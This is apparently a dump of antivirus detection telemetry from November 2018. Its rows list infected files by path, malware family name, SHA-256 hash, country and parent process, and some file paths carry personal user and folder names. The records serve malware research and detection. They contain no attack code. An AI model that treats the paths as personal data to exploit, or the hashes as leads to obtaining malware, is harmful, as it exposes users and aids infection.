  Row(detection=Row(filename='2013.exe', filepath='D:\\DOKUMENKU\\GABUNG KREDIT\\2013\\2013.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:25:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diffupdater.exe', filepath='C:\\Program Files\\Canon\\Auto Update Service\\DiffUpdater.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='035ae9c78f8b49cfda986c1a83d5f42f3f9efcf0c3c2559a91c2b778668f2d20', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HwQ6bAXSE0CSliYn.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=80048, timestamp='2018-11-02T06:50:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp4381638\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:42:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183800-0db80be5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-183752-0C76AA10\\AVSCAN-20181102-183800-0DB80BE5', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:37:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T06:29:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131314-5239a2dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d3a2052\\AVSCAN-20181102-131238-4E3F2C2C\\AVSCAN-20181102-131314-5239A2DD', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213249-7fbb5f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b22022b\\AVSCAN-20181102-213135-7405911C\\AVSCAN-20181102-213249-7FBB5F4A', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3aa5cd03956e6a57b1fe4977e0a8bef6bc737cece32f1286d39a37685b1d1b94', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\3AA5CD03956E6A57B1FE4977E0A8BEF6BC737CECE32F1286D39A37685B1D1B94', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3aa5cd03956e6a57b1fe4977e0a8bef6bc737cece32f1286d39a37685b1d1b94', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144311-da978112', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa4c8b95\\AVSCAN-20181102-144255-D800ECC5\\AVSCAN-20181102-144311-DA978112', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151204-2deefdc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151028-2501E207\\AVSCAN-20181102-151204-2DEEFDC9', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Frieza\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4317f3f043d59dc9ba3a58ad4aee421af6b84509720b3b6574fd1e38c2e44dc8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\41AE011F01D55D8DB992079AAB3309EF327646BFB0BF5D77F380503016D39E7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165655-0605cce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aae89d63\\AVSCAN-20181102-165616-014D4776\\AVSCAN-20181102-165655-0605CCE5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\41AE011F01D55D8DB992079AAB3309EF327646BFB0BF5D77F380503016D39E7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134245-883103d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134245-883103D8', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104332-ff070b2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104332-FF070B2D', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06C59D22D87B82286E1FDE0EBF429444D3F190E5D1BAC53B199AA7D96E9B1B99', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06c59d22d87b82286e1fde0ebf429444d3f190e5d1bac53b199aa7d96e9b1b99', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120115-33464b15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d92e467d\\AVSCAN-20181102-120048-2E5EAEBF\\AVSCAN-20181102-120115-33464B15', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104829-5b43d39f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104829-5B43D39F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dipnqcfe.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\DIpnqCFE.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T15:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230621-3a481996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbcc44a7\\AVSCAN-20181102-230036-F9DC4DB5\\AVSCAN-20181102-230621-3A481996', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:06:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061342-6b3cd7a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061342-6B3CD7A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102213-aaaee122', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_221622d2\\AVSCAN-20181102-101935-92D60ACC\\AVSCAN-20181102-102213-AAAEE122', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:22:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='brsocnbc.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\BRSocNbC.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051559-5a97a072', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051559-5A97A072', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124515-7110aff0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124515-7110AFF0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061446-91281f7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061446-91281F7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132353-1faee5fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132353-1FAEE5FD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:26:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153748-f4cf1c43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153748-F4CF1C43', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:40:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010949-64447f0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-010924-60C888C1\\AVSCAN-20181102-010949-64447F0E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061904-2b06ca0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061904-2B06CA0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:27:45Z'), dt=datetime.date(2018, 11, 2)),
